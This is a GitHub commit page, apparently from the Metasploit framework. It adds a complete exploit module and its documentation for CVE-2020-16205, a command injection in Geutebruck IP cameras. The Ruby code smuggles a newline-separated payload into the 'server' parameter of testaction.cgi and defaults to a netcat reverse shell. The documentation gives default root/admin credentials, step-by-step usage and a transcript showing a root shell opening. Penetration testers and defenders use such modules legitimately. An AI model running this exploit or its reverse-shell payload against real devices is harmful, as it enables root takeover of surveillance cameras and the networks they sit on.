-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #13986, Add CVE-2020-16205 exploit for Geutebruck G-CAM
- Loading branch information
Showing
2 changed files
with
191 additions
and
0 deletions.
There are no files selected for viewing
90 changes: 90 additions & 0 deletions
90
documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,90 @@ | ||
## Vulnerable Application | ||
|
||
The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.25, | ||
firmware version 1.12.13.2 or firmware version 1.12.14.5: | ||
* Encoder and E2 Series Camera models: | ||
* G-Code: | ||
* EEC-2xxx | ||
* G-Cam: | ||
* EBC-21xx | ||
* EFD-22xx | ||
* ETHC-22xx | ||
* EWPC-22xx | ||
|
||
Many brands use the same firmware: | ||
* UDP Technology (which is also the supplier of the firmware for the other vendors) | ||
* Ganz | ||
* Visualint | ||
* Cap | ||
* THRIVE Intelligence | ||
* Sophus | ||
* VCA | ||
* TripCorps | ||
* Sprinx Technologies | ||
* Smartec | ||
* Riva | ||
|
||
This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5. | ||
|
||
### Description | ||
|
||
This module exploits an authenticated OS command injection vulnerability (CVE-2020-16205) within the | ||
`server` GET parameter of /uapi-cgi/admin/testaction.cgi when the `type` parameter is set to `ntp`. | ||
This issue occurs due to a lack of validation on the `server` parameter, which allows an attacker to | ||
inject a new line character, followed by the command they wish to execute, at which point the server will | ||
then interpret the new string as a separate command to be executed. Successful exploitation will result in | ||
remote code execution as the `root` user. | ||
|
||
Users can find additional details of this vulnerability on the advisory page at https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03. | ||
|
||
## Verification Steps | ||
|
||
1. Start the camera using default configuration | ||
2. Launch msfconsole | ||
3. Do: `use exploit/linux/http/geutebruck_testaction_exec` | ||
4. Do: `set httpusername <camera_username>` | ||
5. Do: `set httppassword <camera_password>` | ||
6. Do: `set lhost <metasploit_ip>` | ||
5. Do: `set rhosts <camera_ip>` | ||
6. Do: `set payload cmd/unix/reverse_netcat_gaping` | ||
7. Do: `check` to be sure the target is vulnerable | ||
8. Do: `exploit` | ||
9. You should get a shell | ||
|
||
## Options | ||
|
||
The default credentials to log on the web interface are root/admin. | ||
|
||
### HTTPUSERNAME | ||
A username used to authenticate on the admin page. **Default: root** | ||
|
||
### HTTPPASSWORD | ||
The password of the username used to authenticate on the admin page. **Default: admin** | ||
|
||
## Scenarios | ||
### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5. | ||
``` | ||
msf5 > use exploit/linux/http/geutebruck_testaction_exec | ||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping | ||
payload => cmd/unix/reverse_netcat_gaping | ||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root | ||
httpusername => root | ||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin | ||
httppassword => admin | ||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1 | ||
lhost => 192.168.14.1 | ||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58 | ||
rhosts => 192.168.14.58 | ||
msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit | ||
[*] Started reverse TCP handler on 192.168.14.1:4444 | ||
[*] 192.168.14.58:80 - Attempting to exploit... | ||
[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200 | ||
pwd | ||
/tmp/www_ramdisk/uapi-cgi/admin | ||
id | ||
uid=0(root) gid=0(root) | ||
uname -a | ||
Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux | ||
``` |
101 changes: 101 additions & 0 deletions
101
modules/exploits/linux/http/geutebruck_testaction_exec.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,101 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::CmdStager | ||
prepend Msf::Exploit::Remote::AutoCheck | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'Geutebruck testaction.cgi Remote Command Execution', | ||
'Description' => %q{ | ||
This module exploits an authenticated arbitrary command execution vulnerability within the 'server' | ||
GET parameter of the /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, | ||
ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware | ||
versions 1.12.13.2 and 1.12.14.5 when the 'type' GET paramter is set to 'ntp'. | ||
Successful exploitation results in remote code execution as the root user. | ||
}, | ||
|
||
'Author' => | ||
[ | ||
'Davy Douhine' # ddouhine | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => | ||
[ | ||
[ 'CVE', '2020-16205' ], | ||
[ 'URL', 'http://geutebruck.com' ], | ||
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ], | ||
[ 'URL', 'https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/' ] | ||
], | ||
'DisclosureDate' => 'May 20 2020', | ||
'Privileged' => true, | ||
'Platform' => ['unix', 'linux'], | ||
'Arch' => [ARCH_ARMLE], | ||
'Targets' => [ | ||
[ 'Automatic Target', {} ] | ||
], | ||
'DefaultTarget' => 0, | ||
'DefaultOptions' => | ||
{ | ||
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' | ||
} | ||
) | ||
) | ||
|
||
register_options( | ||
[ | ||
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]), | ||
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]), | ||
OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']), | ||
] | ||
) | ||
end | ||
|
||
def firmware | ||
begin | ||
res = send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => '/brand.xml' | ||
) | ||
unless res | ||
vprint_error 'Connection failed' | ||
return CheckCode::Unknown | ||
end | ||
|
||
res_xml = res.get_xml_document | ||
@version = res_xml.at('//firmware').text | ||
return true | ||
end | ||
end | ||
|
||
def check | ||
result = firmware | ||
return result unless result == true | ||
|
||
version = Gem::Version.new(@version) | ||
vprint_status "Found Geutebruck version #{version}" | ||
if version < Gem::Version.new('1.12.0.25') || version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5') | ||
return CheckCode::Appears | ||
end | ||
|
||
CheckCode::Safe | ||
end | ||
|
||
def exploit | ||
print_status("#{rhost}:#{rport} - Attempting to exploit...") | ||
send_request_cgi( | ||
{ | ||
'method' => 'GET', | ||
'uri' => target_uri.path, | ||
'vars_get' => { 'type' => 'ntp', 'server' => "\n#{payload.encoded}" } | ||
} | ||
) | ||
end | ||
end |